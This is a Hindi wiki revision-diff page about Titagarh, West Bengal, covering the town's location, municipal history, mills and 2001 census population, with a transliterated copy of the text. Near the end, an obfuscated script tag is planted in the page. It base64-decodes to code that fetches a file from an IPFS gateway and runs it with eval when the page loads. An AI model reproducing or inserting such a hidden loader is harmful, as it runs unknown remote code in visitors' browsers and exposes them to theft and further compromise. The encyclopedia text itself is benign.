Difference between revisions of "टीटागढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*टीटागढ़ शहर, उत्तरी चौबीस परगना ज़िला, दक्षिण-पश्चिम [[पश्चिम बंगाल]] राज्य, पूर्वोत्तर [[भारत]] में स्थित है।  
+
'''टीटागढ़''', [[उत्तरी चौबीस परगना ज़िला]], दक्षिण-पश्चिम [[पश्चिम बंगाल]] राज्य, पूर्वोत्तर [[भारत]] में स्थित है।  
*यह [[हुगली नदी]] के ठीक पूर्व में स्थित है और [[कोलकाता]] (भूतपूर्व कलकत्ता) महानगरीय ज़िले के भीतर कोलकाता शहरी संकेंद्रण का हिस्सा है।  
+
*टीटागढ़ [[हुगली नदी]] के ठीक पूर्व में स्थित है और [[कोलकाता]] (भूतपूर्व कलकत्ता) महानगरीय ज़िले के भीतर कोलकाता शहरी संकेंद्रण का हिस्सा है।  
*यह शहर कभी यूरोपीय लोगों का आधुनिक निवास स्थल था।  
+
*टीटागढ़ शहर कभी यूरोपीय लोगों का आधुनिक निवास स्थल था।  
*[[1895]] में बैरकपुर नगरपालिका से अलग कर टीटागढ़ का नगरपालिका के रूप में गठन किया गया।  
+
*[[1895]] में [[बैरकपुर]] नगरपालिका से अलग कर टीटागढ़ का नगरपालिका के रूप में गठन किया गया।  
*कोलकाता से रेल व सड़क मार्ग से जुड़े इस शहर में जूट व काग़ज़ की मिलें हैं और यहाँ काँच एवं वस्त्रोद्योग से संबंधित मशीनों का निर्माण तथा चाय प्रसंस्करण होता है।  
+
*कोलकाता से रेल व सड़क मार्ग से जुड़े इस शहर में [[जूट]] [[काग़ज़]] की मिलें हैं और यहाँ काँच एवं वस्त्रोद्योग से संबंधित मशीनों का निर्माण तथा [[चाय]] प्रसंस्करण होता है।  
 
*2001 की जनगणना की अनुसार टीटागढ़ शहर की कुल जनसंख्या 1,24,198 है।  
 
*2001 की जनगणना की अनुसार टीटागढ़ शहर की कुल जनसंख्या 1,24,198 है।  
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 14: Line 13:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{तमिलनाडु के नगर}}
+
{{पश्चिम बंगाल के नगर}}
 
[[Category:पश्चिम बंगाल]][[Category:पश्चिम बंगाल के नगर]][[Category:भारत के नगर]]
 
[[Category:पश्चिम बंगाल]][[Category:पश्चिम बंगाल के नगर]][[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Latest revision as of 10:14, 8 February 2012

titagadh, uttari chaubis paragana zila, dakshin-pashchim pashchim bangal rajy, poorvottar bharat mean sthit hai.

  • titagadh hugali nadi ke thik poorv mean sthit hai aur kolakata (bhootapoorv kalakatta) mahanagariy zile ke bhitar kolakata shahari sankeandran ka hissa hai.
  • titagadh shahar kabhi yooropiy logoan ka adhunik nivas sthal tha.
  • 1895 mean bairakapur nagarapalika se alag kar titagadh ka nagarapalika ke roop mean gathan kiya gaya.
  • kolakata se rel v s dak marg se ju de is shahar mean joot v kagaz ki milean haian aur yahaan kaanch evan vastrodyog se sanbandhit mashinoan ka nirman tatha chay prasanskaran hota hai.
  • 2001 ki janaganana ki anusar titagadh shahar ki kul janasankhya 1,24,198 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh